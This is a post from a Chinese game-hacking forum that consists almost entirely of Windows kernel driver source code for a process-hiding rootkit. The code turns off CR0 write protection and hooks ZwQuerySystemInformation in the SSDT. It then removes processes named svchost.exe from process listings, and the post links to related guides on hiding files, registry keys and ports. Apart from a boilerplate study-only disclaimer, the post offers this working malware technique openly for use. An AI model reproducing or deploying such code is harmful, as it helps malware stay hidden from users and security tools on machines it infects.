|
|
提醒:若下载的软件是收费的"请不要付款",可能是骗子,请立即联系本站举报,执意要付款被骗后本站概不负责。(任何交易请走第三方中介,请勿直接付款交易以免被骗!切记).
- #include "ntddk.h"
- #include "string.h"
-
- #define IOCTL_EVENT_MSG CTL_CODE(FILE_DEVICE_UNKNOWN, 0x927, METHOD_BUFFERED , FILE_ANY_ACCESS)
- #pragma warning(disable: 4047 4018)
- #ifdef __cplusplus
- extern "C"
- #endif
-
- struct _SYSTEM_THREADS
- {
- LARGE_INTEGER KernelTime; //内核模式时间计数
- LARGE_INTEGER UserTime; //用户模式时间计数
- LARGE_INTEGER CreateTime; //创建线程时间
- ULONG WaitTime; //等待时间
- PVOID StartAddress; //线程起始地址
- CLIENT_ID ClientIs; //线程进程ID
- KPRIORITY Priority; //优先级
- KPRIORITY BasePriority; //基优先级
- ULONG ContextSwitchCount; //线程环境切换计数
- ULONG ThreadState; //线程状态
- KWAIT_REASON WaitReason; //线程等待原因
- };
-
- struct _SYSTEM_PROCESSES
- {
- ULONG NextEntryDelta; //下一个进程信息的偏移量,如果为0表示无一个进程信息
- ULONG ThreadCount; //线程数量
- ULONG Reserved[6]; //
- LARGE_INTEGER CreateTime; //创建进程的时间
- LARGE_INTEGER UserTime; //进程中所有线程在用户模式运行时间的总和
- LARGE_INTEGER KernelTime; //进程中所有线程在内核模式运行时间的总和
- UNICODE_STRING ProcessName; //进程的名字
- KPRIORITY BasePriority; //线程的缺省优先级
- ULONG ProcessId; //进程ID号
- ULONG InheritedFromProcessId; //继承语柄的进程ID号
- ULONG HandleCount; //进程打开的语柄数量
- ULONG Reserved2[2]; //
- VM_COUNTERS VmCounters; //虚拟内存的使用情况统计
- IO_COUNTERS IoCounters; //IO操作的统计,Only For 2000
- struct _SYSTEM_THREADS Threads[1]; //描述进程中各线程的数组
- };
-
- #pragma pack(1)
-
- typedef struct _ServiceDescriptorEntry {
- unsigned int *ServiceTableBase; //系统服务数组表
- unsigned int *ServiceCounterTableBase; //数组使用计数
- unsigned int NumberOfServices; //服务数量
- unsigned char *ParamTableBase; //服务参数数目表
- }ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;
-
- #pragma pack()
-
- //系统服务表入口地址
- extern PServiceDescriptorTableEntry KeServiceDescriptorTable;
-
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwQuerySystemInformation(
- IN ULONG SystemInformationClass, //查询系统服务类型
- IN PVOID SystemInformation, //接收系统信息缓冲区
- IN ULONG SystemInformationLength, //接收信息缓冲区大小
- OUT PULONG ReturnLength); //实际接收到的大小
-
- typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)
- (
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength);
-
- REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;
-
- UNICODE_STRING hide_process_name;
- ULONG CR0VALUE;
-
- NTSTATUS HookZwQuerySystemInformation(
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength);
-
- VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject);
-
-
- NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
- {
-
- DriverObject->DriverUnload = DriverUnload;
-
- __asm{
- mov eax, cr0
- mov CR0VALUE, eax
- and eax, 0fffeffffh //DisableWriteProtect
- mov cr0, eax
- }
-
-
- //取得原来ZwQuerySystemInformation的入口地址
- RealZwQuerySystemInformation = (REALZWQUERYSYSTEMINFORMATION)( ((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)] );
-
- //Hook
- ((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)] = HookZwQuerySystemInformation;
-
- //EnableWriteProtect
- __asm
- {
- mov eax, CR0VALUE
- mov cr0, eax
- }
- DbgPrint(("Driver has been Load !"));
- return STATUS_SUCCESS;
- }
-
-
- VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject)
- {
-
-
- __asm{
- mov eax, cr0
- mov CR0VALUE, eax
- and eax, 0fffeffffh //DisableWriteProtect
- mov cr0, eax
- }
-
-
- ((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)] = RealZwQuerySystemInformation;
-
- //EnableWriteProtect
- __asm
- {
- mov eax, CR0VALUE
- mov cr0, eax
- }
-
-
-
- DbgPrint(("Driver has been Unload !"));
- return;
-
- }
-
- NTSTATUS HookZwQuerySystemInformation(
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength)
- {
- NTSTATUS rc;
- struct _SYSTEM_PROCESSES *curr;// 保存上一个进程信息的指针
- struct _SYSTEM_PROCESSES *prev = NULL;
- RtlInitUnicodeString(&hide_process_name,L"svchost.exe");
-
-
- rc = (RealZwQuerySystemInformation) (
- SystemInformationClass,
- SystemInformation,
- SystemInformationLength,
- ReturnLength);
-
- if(NT_SUCCESS(rc))
- {
- if(5 == SystemInformationClass)
- {
-
- curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
- //struct _SYSTEM_PROCESSES *prev = NULL;
-
- //加第一个偏移量得到第一个system进程的信息首地址
- if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
-
-
-
- while(curr)
- {
- if (RtlCompareUnicodeString(&hide_process_name, &curr->ProcessName, 1) == 0)
- {
- //找到要隐藏的进程
- if(prev)
- {
-
- if(curr->NextEntryDelta)
- {
- //要删除的信息在中间
- prev->NextEntryDelta += curr->NextEntryDelta;
- }
- else
- {
- //要删除的信息在末尾
- prev->NextEntryDelta = 0;
- }
- }
- else
- {
- if(curr->NextEntryDelta)
- {
- //要删除的信息在开头
- (char *)SystemInformation += curr->NextEntryDelta;
- }
- else
- {
- SystemInformation = NULL;
- }
- }
- //如果链下一个还有其他的进程信息,指针往后移
- if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
- else
- {
- curr = NULL;
- break;
- }
- }
-
- if(curr != NULL)
- {
- //把当前指针设置成前一个指针,当前指针后移
- prev = curr;
- if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
- else curr = NULL;
- }
-
- } // end while(curr)
- }
- }
- return rc;
- }
联系我时,请说是在 挂海论坛 上看到的,谢谢! |
上一篇: 隐藏你程序的窗体,让其他程序不能枚举下一篇: 教你如何隐藏任意进程,目录/文件,注册表,端口
免责声明:
1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关。一切关于该内容及资源商业行为与www.52ghai.com无关。
2、本站提供的一切资源内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。
3、本站信息来自第三方用户,非本站自制,版权归原作者享有,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
4、如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵犯你版权的,请邮件与我们联系删除(邮箱:xhzlw@foxmail.com),本站将立即改正。
|
好评
贡献
海币
交易币
发表于 2015-2-9 23:08:48
收藏
转播
淘帖
支持
反对
提升卡
置顶卡
变色卡
千斤顶
照妖镜